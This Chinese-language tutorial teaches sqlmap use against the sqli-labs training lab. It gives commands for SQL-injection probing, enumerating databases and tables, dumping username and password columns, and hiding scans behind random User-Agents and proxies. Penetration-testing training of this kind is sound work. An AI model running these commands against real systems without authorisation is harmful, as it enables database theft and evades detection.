SQLMAP的使用
目录
一、SQLMAP 介绍
1、SQLMAP 简介

2、SQLMAP 支持的注入类型

3、运行 sqlmap

4、SQLMAP 常用参数介绍
sqlmap --version #查看 sqlmap 版本信息.-h #查看功能参数(常用的)-hh #查看所有的参数 (如果有中文包 就最好了)-v #显示更详细的信息 一共 7 级, 从 0-6.默认为 1, 数值越大,信息显示越 详细.Target #(指定目标):-d #直接连接数据库侦听端口,类似于把自己当一个客户端来连接.-u #指定 url 扫描,但 url 必须存在查询参数. 例: xxx.php?id=1-l #指定 logfile 文件进行扫描,可以结合 burp 把访问的记录保存成一个 log 文件, sqlmap 可以直接加载 burp 保存到 log 文件进行扫描-m #如果有多个 url 地址,可以把多个 url 保存成一个文本文件 -m 可以加载 文本文件逐个扫描-r #把 http 的请求头,body 保存成一个文件 统一提交给 sqlmap,sqlmap 会读取内容进行拼接请求体--timeout #指定超时时间--retries #指定重试次数--skip-urlencode #不进行 URL 加密
二、SQLMAP 常用探测方式
1、探测单个目标
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.103/sqli-labs/Less-1/?id=1"
2、探测多个目标
┌──(root💀kali)-[~]
└─# vim xuegod.txthttp://192.168.1.103/sqli-labs/Less-1/?id=1http://192.168.1.103/sqli-labs/Less-2/?id=1http://192.168.1.103/sqli-labs/Less-3/?id=1
3、从文件加载 HTTP 请求进行探测

┌──(root💀kali)-[~]
└─# vim cookie.txt
GET /sqli-labs/Less-20/index.php HTTP/1.1
Host: 192.168.1.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.102/sqli-labs/Less-20/
Connection: close
Cookie: uname=admin
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
└─# sqlmap -r cookie.txt --level 3 --batch – dbs
4、从 burpsuite 日志记录中进行探测
Burpsuite 开启日志记录
└─# sqlmap -l burpsuite.txt --leve 3 --dbs --batch
5、检测 SQL 注入漏洞存在的技术类型

└─# sqlmap -u "http://192.168.1.63/sqli-labs/Less-1/?id=1" --technique=B --batch
6、枚举数据库信息
└─# sqlmap -u "http://192.168.1.63/sqli-labs/Less-1/?id=1" --dbs
└─# sqlmap -u "http://192.168.1.63/sqli-labs/Less-1/?id=1" -D security --tables-D
└─# sqlmap -u "http://192.168.1.63/sqli-labs/Less-1/?id=1" -D security -T users --columns
└─# sqlmap -u "http://192.168.1.63/sqli-labs/Less-1/?id=1" -D security --tables --columns
└─# sqlmap -u "http://192.168.1.63/sqli-labs/Less-1/?id=1" --dump -D security -Tusers -C "username,password"
三、SQLMAP 请求参数
1、默认的请求参数
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.102/sqli-labs/Less-1/?id=1" --batch
2、修改默认请求参数
└─# sqlmap -u "http://192.168.1.102/sqli-labs/Less-1/?id=1" --user-agent="Mozilla/5.0(X11; Linux x86_64; rv:68.0) Gecko/20100101" --batch--user-agent #手动指定 User-Agent 内容
例 2:随机修改请求参数
└─# sqlmap -u "http://192.168.1.63/sqli-labs/Less-1/?id=1" --random-agent --batch
3、使用代理进行探测
使用代理进行探测时,是不能够探测内网目标的,除非目标在公网也能够正常访问。
┌──(root💀kali)-[~]└─# sqlmap -u "IP" --proxy"http://49.86.177.212:9999" --delay="1" --random-agent --batch
└─# vim proxy.txt
└─# sqlmap -u "IP" --proxyfile=/root/proxy.txt --delay 1 --random-agent --batch